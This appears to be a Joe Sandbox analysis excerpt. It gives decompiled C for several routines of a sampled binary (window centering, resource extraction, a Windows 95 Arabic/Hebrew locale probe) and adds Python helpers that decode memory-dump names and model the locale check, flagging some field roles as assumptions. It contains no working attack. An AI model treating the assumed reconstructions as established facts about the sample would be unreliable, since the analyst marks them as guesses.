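"""Decode Joe Sandbox memory-dump (.sdmp) file names as listed under
"Memory Dump Source" and summarise each region by page protection.

Added example, not code from the Joe Sandbox report. Field roles other
than base address and protection are assumed (see the regex comment).
"""
import re
from dataclasses import dataclass

# Windows memory protection constants (winnt.h).
PAGE_NOACCESS          = 0x01
PAGE_READONLY          = 0x02
PAGE_READWRITE         = 0x04
PAGE_WRITECOPY         = 0x08
PAGE_EXECUTE           = 0x10
PAGE_EXECUTE_READ      = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PAGE_GUARD             = 0x100   # modifier bit, masked off when naming the base protection

_PROT_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS", PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE", PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE", PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}

# Eight dotted fields then ".sdmp". Field roles are an ASSUMPTION based on
# the names in the report: process index, dump stage, dump id, base
# address (16 hex digits), protection, type, and two unexplained fields.
_SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\."
    r"(?P<dump_id>[0-9]+)\.(?P<base>[0-9A-Fa-f]{16})\."
    r"(?P<prot>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\."
    r"(?P<f7>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass
class DumpRegion:
    name: str
    process_index: int
    base: int
    protection: int

    @property
    def protection_name(self) -> str:
        base = self.protection & 0xFF   # drop PAGE_GUARD / cache modifiers
        return _PROT_NAMES.get(base, f"0x{base:02x}")

    @property
    def executable(self) -> bool:
        return bool(self.protection & (PAGE_EXECUTE | PAGE_EXECUTE_READ |
                                       PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY))

    @property
    def writable(self) -> bool:
        return bool(self.protection & (PAGE_READWRITE | PAGE_WRITECOPY |
                                       PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY))


def parse_sdmp_name(name: str) -> DumpRegion:
    """Parse one .sdmp file name; raise ValueError if it does not match."""
    m = _SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not an .sdmp name: {name!r}")
    return DumpRegion(
        name=name.strip(),
        process_index=int(m["proc"], 16),
        base=int(m["base"], 16),
        protection=int(m["prot"], 16),
    )


def layout(names):
    """Return (base, protection name, W+X flag) per region, sorted by base."""
    regions = sorted((parse_sdmp_name(n) for n in names), key=lambda r: r.base)
    return [(r.base, r.protection_name, r.executable and r.writable) for r in regions]


# The five dump names the report lists for the module loaded at 0x190000.
REPORT_DUMPS = [
    "00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp",
    "00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp",
    "00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp",
    "00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp",
    "00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp",
]

if __name__ == "__main__":
    for base, prot, wx in layout(REPORT_DUMPS):
        print(f"0x{base:08x}  {prot:<24}{'W+X' if wx else ''}")
```

Run as a script it prints the module layout in address order; the code region at 0x191000 comes out as PAGE_EXECUTE_READ and the data region at 0x198000 (where the stack cookie read by the decompiled function below lives, at 0x198004) as PAGE_READWRITE.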
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 571164536-0
                                                                                                                                                                                                                                    • Opcode ID: 7ab300075cfd969b1d5ddc4472a8c012c68bc1b61266f6198f507f6167ebc96f
                                                                                                                                                                                                                                    • Instruction ID: 5e811cf8040dcc7045c3af053554ca7bfb014a3d45b130c47f2f771fca592a3a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ab300075cfd969b1d5ddc4472a8c012c68bc1b61266f6198f507f6167ebc96f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 954126345042466FDF259F34DC54AFD7BA99F56310F1400EAE8C383602DB759E8ACBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E001943D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				struct tagRECT _v24;
                                                                                                                                                                                                                                    				struct tagRECT _v40;
                                                                                                                                                                                                                                    				struct HWND__* _v44;
                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                    				int _v52;
                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                    				int _v60;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                                                    				void* _t53;
                                                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                                                    				int _t59;
                                                                                                                                                                                                                                    				struct HWND__* _t63;
                                                                                                                                                                                                                                    				struct HWND__* _t67;
                                                                                                                                                                                                                                    				struct HWND__* _t68;
                                                                                                                                                                                                                                    				struct HDC__* _t69;
                                                                                                                                                                                                                                    				int _t72;
                                                                                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                                                                                    
				_t63 = __edx;
				// /GS stack cookie: __security_cookie (at 0x198004 in the data region) XORed with the frame pointer
				_t29 =  *0x198004; // 0x21bd9a3c
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);	// __ecx: the window being positioned
				_t53 = _v40.bottom - _v40.top;	// its height
				_v48 = _v40.right - _v40.left;	// its width
				GetWindowRect(_t68,  &_v24);	// __edx: the reference (owner) window
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);	// 8 = HORZRES: screen width in pixels
				_v60 = GetDeviceCaps(_t69, 0xa);	// 0xa = VERTRES: screen height in pixels
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");	// sign-extend for the signed divide-by-two below
				// x = ref.left + (ref.width - width) / 2; the "- _t63" is edx after cdq (the sign bit of
				// the signed /2 idiom), not the HWND, which the decompiler did not separate
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {	// keep the right edge on screen
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;	// keep the left edge at or right of 0
				}
				asm("cdq");
                                                                                                                                                                                                                                    				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                    				if(_t59 >= 0) {
                                                                                                                                                                                                                                    					_t63 = _v60;
                                                                                                                                                                                                                                    					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                    						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t59 = _t67;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00196CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 001943F1
                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0019440B
                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00194423
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0019442E
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0019443A
                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00194447
                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 001944A2
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2212493051-0
                                                                                                                                                                                                                                    • Opcode ID: dc70507b90b34576e5c94405ce776396e55455e54271de76df59051d9301a701
                                                                                                                                                                                                                                    • Instruction ID: f6d5d7a85b142238e70a575731717be39af613991b520f14886abf23bf03b630
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc70507b90b34576e5c94405ce776396e55455e54271de76df59051d9301a701
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70311932E00119ABCF14CFB8DD89DEEBBB5EF89310F554169F805B3250DA30AD458BA1
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E00196298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                                                    				struct HRSRC__* _t21;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t44 = __edx;
                                                                                                                                                                                                                                    				_t16 =  *0x198004; // 0x21bd9a3c
                                                                                                                                                                                                                                    				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                    				_t46 = 0;
                                                                                                                                                                                                                                    				_v32 = __ecx;
                                                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                                                    				_t36 = 1;
                                                                                                                                                                                                                                    				E0019171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                    					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                    					if(_t21 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                    					if(_t45 == 0) {
                                                                                                                                                                                                                                    						 *0x199124 = 0x80070714;
                                                                                                                                                                                                                                    						_t36 = _t46;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                    						_t44 = _t5;
                                                                                                                                                                                                                                    						_t40 = _t44;
                                                                                                                                                                                                                                    						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                    						_t47 = _t6;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t26 =  *_t40;
                                                                                                                                                                                                                                    							_t40 = _t40 + 1;
                                                                                                                                                                                                                                    						} while (_t26 != 0);
                                                                                                                                                                                                                                    						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                    						_t46 = _t51;
                                                                                                                                                                                                                                    						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                    						 *0x19a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                    						_t30 = _v32();
                                                                                                                                                                                                                                    						if(_t51 != _t51) {
                                                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_push(_t45);
                                                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                                                    							_t36 = 0;
                                                                                                                                                                                                                                    							FreeResource(??);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							FreeResource();
                                                                                                                                                                                                                                    							_v36 = _v36 + 1;
                                                                                                                                                                                                                                    							E0019171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                    							_t46 = 0;
                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					return E00196CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x00196298
                                                                                                                                                                                                                                    0x001962a0
                                                                                                                                                                                                                                    0x001962a7
                                                                                                                                                                                                                                    0x001962ad
                                                                                                                                                                                                                                    0x001962af
                                                                                                                                                                                                                                    0x001962bb
                                                                                                                                                                                                                                    0x001962c3
                                                                                                                                                                                                                                    0x001962c4
                                                                                                                                                                                                                                    0x0019633b
                                                                                                                                                                                                                                    0x0019633b
                                                                                                                                                                                                                                    0x00196345
                                                                                                                                                                                                                                    0x0019634d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001962da
                                                                                                                                                                                                                                    0x001962de
                                                                                                                                                                                                                                    0x0019635f
                                                                                                                                                                                                                                    0x00196369
                                                                                                                                                                                                                                    0x001962e0
                                                                                                                                                                                                                                    0x001962e0
                                                                                                                                                                                                                                    0x001962e0
                                                                                                                                                                                                                                    0x001962e3
                                                                                                                                                                                                                                    0x001962e5
                                                                                                                                                                                                                                    0x001962e5
                                                                                                                                                                                                                                    0x001962e8
                                                                                                                                                                                                                                    0x001962e8
                                                                                                                                                                                                                                    0x001962ea
                                                                                                                                                                                                                                    0x001962eb
                                                                                                                                                                                                                                    0x001962ef
                                                                                                                                                                                                                                    0x001962f1
                                                                                                                                                                                                                                    0x001962f3
                                                                                                                                                                                                                                    0x00196302
                                                                                                                                                                                                                                    0x00196308
                                                                                                                                                                                                                                    0x0019630d
                                                                                                                                                                                                                                    0x00196314
                                                                                                                                                                                                                                    0x00196314
                                                                                                                                                                                                                                    0x00196316
                                                                                                                                                                                                                                    0x00196319
                                                                                                                                                                                                                                    0x00196355
                                                                                                                                                                                                                                    0x00196357
                                                                                                                                                                                                                                    0x0019631b
                                                                                                                                                                                                                                    0x0019631b
                                                                                                                                                                                                                                    0x00196331
                                                                                                                                                                                                                                    0x00196334
                                                                                                                                                                                                                                    0x00196339
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196339
                                                                                                                                                                                                                                    0x00196319
                                                                                                                                                                                                                                    0x0019636b
                                                                                                                                                                                                                                    0x0019637d
                                                                                                                                                                                                                                    0x0019637d
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0019171E: _vsnprintf.MSVCRT ref: 00191750
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,001951CA,00000004,00000024,00192F71,?,00000002,00000000), ref: 001962CD
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,001951CA,00000004,00000024,00192F71,?,00000002,00000000), ref: 001962D4
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001951CA,00000004,00000024,00192F71,?,00000002,00000000), ref: 0019631B
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00196345
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001951CA,00000004,00000024,00192F71,?,00000002,00000000), ref: 00196357
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                    • String ID: UPDFILE%lu
                                                                                                                                                                                                                                    • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                    • Opcode ID: 1b8ca0ab0f2bc0500400d43678d92744d0ff8ca86dac682bc79d7c84df4ef509
                                                                                                                                                                                                                                    • Instruction ID: a033827bffa334d70dc8b90ba1d748310c01986f89d983e465dce737a352e0f7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b8ca0ab0f2bc0500400d43678d92744d0ff8ca86dac682bc79d7c84df4ef509
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F21F175A0021AABDF149FA49C459BEBB7CFF48710B04012AF906A3641DB359E468BF1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E0019681F(void* __ebx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                    				void* _v172;
                                                                                                                                                                                                                                    				int* _v176;
    int _v180;
    int _v184;
    void* __edi;
    void* __esi;
    signed int _t19;
    long _t31;
    signed int _t35;
    void* _t36;
    intOrPtr _t41;
    signed int _t44;

    _t36 = __ebx;
    _t19 = *0x198004; // 0x21bd9a3c
    _v8 = _t19 ^ _t44;
    _t41 = *0x1981d8; // 0xfffffffe
    _t43 = 0;
    _v180 = 0xc;
    _v176 = 0;
    if(_t41 == 0xfffffffe) {
        *0x1981d8 = 0;
        _v168.dwOSVersionInfoSize = 0x94;
        if(GetVersionExA( &_v168) == 0) {
            L12:
            _t41 = *0x1981d8; // 0xfffffffe
        } else {
            _t41 = 1;
            if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, &_v172) != 0) {
                goto L12;
            } else {
                _t31 = RegQueryValueExA(_v172, 0x191140, 0, &_v184, &_v20, &_v180);
                _t43 = _t31;
                RegCloseKey(_v172);
                if(_t31 != 0) {
                    goto L12;
                } else {
                    _t40 = &_v176;
                    if(E001966F9( &_v20, &_v176) == 0) {
                        goto L12;
                    } else {
                        _t35 = _v176 & 0x000003ff;
                        if(_t35 == 1 || _t35 == 0xd) {
                            *0x1981d8 = _t41;
                        } else {
                            goto L12;
                        }
                    }
                }
            }
        }
    }
    return E00196CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
}

APIs
• GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0019686E
• GetSystemMetrics.USER32(0000004A), ref: 001968A7
• RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001968CC
• RegQueryValueExA.ADVAPI32(?,00191140,00000000,?,?,0000000C), ref: 001968F4
• RegCloseKey.ADVAPI32(?), ref: 00196902
  • Part of subcall function 001966F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0019691A), ref: 00196741
Strings
• Control Panel\Desktop\ResourceLocale, xrefs: 001968C2
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
• String ID: Control Panel\Desktop\ResourceLocale
• API String ID: 3346862599-1109908249
• Opcode ID: f64472c693f1b3d6814de6b4d3b2a646bafbf5d688aaba3942a764a0b59bca8c
• Instruction ID: 0b9a98903ff877e80cad587af08150168cda6f1a16924b2678fa5f4956579163
• Opcode Fuzzy Hash: f64472c693f1b3d6814de6b4d3b2a646bafbf5d688aaba3942a764a0b59bca8c
• Instruction Fuzzy Hash: 96316131A002289FDF21DF11CC45FAAB778FF46768F0401A7E949A2140DB319E89CFA2
Uniqueness

Uniqueness Score: -1.00%
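What the routine above decides (analyst note and added example; the Python is a re-implementation written for this page, not code from the sample or from Joe Sandbox): the branch chain only sets the global at 0x1981d8 to 1 when GetVersionExA reports dwPlatformId 1 (VER_PLATFORM_WIN32_WINDOWS, i.e. Win9x) with version 4.0x (major 4, minor below 0xa, so Windows 95 but not 98), GetSystemMetrics(0x4a) (SM_MIDEASTENABLED) is non-zero, HKCU\Control Panel\Desktop\ResourceLocale can be opened and read into a 0xc-byte buffer, the value parses, and its primary language ID (low 10 bits, the PRIMARYLANGID mask 0x3ff) is LANG_ARABIC (0x01) or LANG_HEBREW (0x0d). Every other path jumps to L12 and returns the global that was just cleared to 0. In other words this is a right-to-left localized-system probe for Windows 95-era hosts, which is why the report flags locale querying; on the Windows 10 analysis VM it returns 0 immediately after the platform check. The code below models that gate offline on constructed inputs. Two things are assumptions, not facts from the report: that the helper E001966F9 (which walks the string with CharNextA) parses the REG_SZ value as a hexadecimal LCID, and that the 0xc-byte buffer passed to RegQueryValueExA turns an over-long value into a failure (ERROR_MORE_DATA), modelled here as a rejected host.

```python
"""Model of the Win95 BiDi-locale gate decompiled above (added example, not the
sample's code).  Constants are documented Win32 values; the hex-LCID parse and the
buffer-overflow-as-failure behaviour are assumptions stated in the lead-in."""
from dataclasses import dataclass
from typing import Optional

VER_PLATFORM_WIN32_WINDOWS = 1      # dwPlatformId for Windows 95/98/Me
SM_MIDEASTENABLED = 0x4A            # GetSystemMetrics index used by the sample
LANG_ARABIC = 0x01
LANG_HEBREW = 0x0D
PRIMARY_LANG_MASK = 0x3FF           # PRIMARYLANGID(lgid) == lgid & 0x3ff
REG_BUFFER_SIZE = 0x0C              # _v180 = 0xc passed to RegQueryValueExA


@dataclass
class HostState:
    """Constructed stand-in for the live API results the routine queries."""
    platform_id: int                 # OSVERSIONINFOA.dwPlatformId
    major: int                       # OSVERSIONINFOA.dwMajorVersion
    minor: int                       # OSVERSIONINFOA.dwMinorVersion
    mideast_enabled: bool            # GetSystemMetrics(SM_MIDEASTENABLED) != 0
    resource_locale: Optional[str]   # HKCU\Control Panel\Desktop\ResourceLocale; None = open/query failed


def parse_resource_locale(value: str) -> Optional[int]:
    """Assumed behaviour of E001966F9: hex string -> LCID, None if it does not parse."""
    text = value.rstrip("\x00").strip()
    if not text:
        return None
    try:
        return int(text, 16)
    except ValueError:
        return None


def primary_lang_id(lcid: int) -> int:
    """PRIMARYLANGID: the low 10 bits of a language/locale identifier."""
    return lcid & PRIMARY_LANG_MASK


def is_bidi_localized_win95(host: HostState) -> bool:
    """Mirror of the branch chain; every failed check is a 'goto L12' returning 0."""
    if host.platform_id != VER_PLATFORM_WIN32_WINDOWS:
        return False                                  # NT-family hosts (e.g. the sandbox VM) exit here
    if host.major != 4 or host.minor >= 0x0A:
        return False                                  # Windows 95 (4.0x) only, Win98 is 4.10
    if not host.mideast_enabled:
        return False                                  # GetSystemMetrics(0x4a) == 0
    if host.resource_locale is None:
        return False                                  # RegOpenKeyExA / RegQueryValueExA failed
    raw = host.resource_locale.rstrip("\x00")
    if len(raw) + 1 > REG_BUFFER_SIZE:
        return False                                  # assumed: ERROR_MORE_DATA on the 0xc-byte buffer
    lcid = parse_resource_locale(raw)
    if lcid is None:
        return False                                  # E001966F9 returned 0
    return primary_lang_id(lcid) in (LANG_ARABIC, LANG_HEBREW)


if __name__ == "__main__":
    # Constructed hosts: Win95 Arabic, Win95 Hebrew, Win95 US English, Win98 Arabic, NT-family.
    samples = {
        "win95 ar-SA": HostState(1, 4, 0, True, "00000401"),
        "win95 he-IL": HostState(1, 4, 0, True, "0000040d"),
        "win95 en-US": HostState(1, 4, 0, True, "00000409"),
        "win98 ar-SA": HostState(1, 4, 10, True, "00000401"),
        "nt   ar-SA": HostState(2, 10, 0, True, "00000401"),
    }
    for name, host in samples.items():
        print(f"{name}: {int(is_bidi_localized_win95(host))}")
```

The only host that reaches the language test is a Windows 95 machine with Middle East support switched on; the check therefore tells an analyst little about evasion on its own and should be read together with the other locale and WMI queries the report lists.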

C-Code - Quality: 100%
E00193A3F(void* __eflags) {
    void* _t3;
    void* _t9;
    CHAR* _t16;

    _t16 = "LICENSE";
    _t1 = E0019468F(_t16, 0, 0) + 1; // 0x1
    _t3 = LocalAlloc(0x40, _t1);
    *0x198d4c = _t3;
    if(_t3 != 0) {
        _t19 = _t16;
        if(E0019468F(_t16, _t3, _t28) != 0) {
            if(lstrcmpA( *0x198d4c, "<None>") == 0) {
                LocalFree( *0x198d4c);
                L9:
                *0x199124 = 0;
                return 1;
            }
            _t9 = E00196517(_t19, 0x7d1, 0, E00193100, 0, 0);
            LocalFree( *0x198d4c);
            if(_t9 != 0) {
                                                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *0x199124 = 0x800704c7;
                                                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					E001944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    					LocalFree( *0x198d4c);
                                                                                                                                                                                                                                    					 *0x199124 = 0x80070714;
                                                                                                                                                                                                                                    					goto L2;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				E001944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    				 *0x199124 = E00196285();
                                                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                                                    			}






Instruction addresses for the listing above, in listing order: 0x00193a46, 0x00193a57, 0x00193a5d, 0x00193a63, 0x00193a6a, 0x00193a91, 0x00193a9a, 0x00193ad8, 0x00193b13, 0x00193b19, 0x00193b1b, 0x00000000, 0x00193b21, 0x00193ae7, 0x00193af4, 0x00193afc, 0x00000000, 0x00000000, 0x00193afe, 0x00193a87, 0x00000000, 0x00193a87, 0x00193aa8, 0x00193ab3, 0x00193ab9, 0x00000000, 0x00193ab9, 0x00193a78, 0x00193a82, 0x00000000

APIs
  • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
  • Part of subcall function 0019468F: SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
  • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
  • Part of subcall function 0019468F: LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
  • Part of subcall function 0019468F: LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
  • Part of subcall function 0019468F: memcpy_s.MSVCRT ref: 001946E5
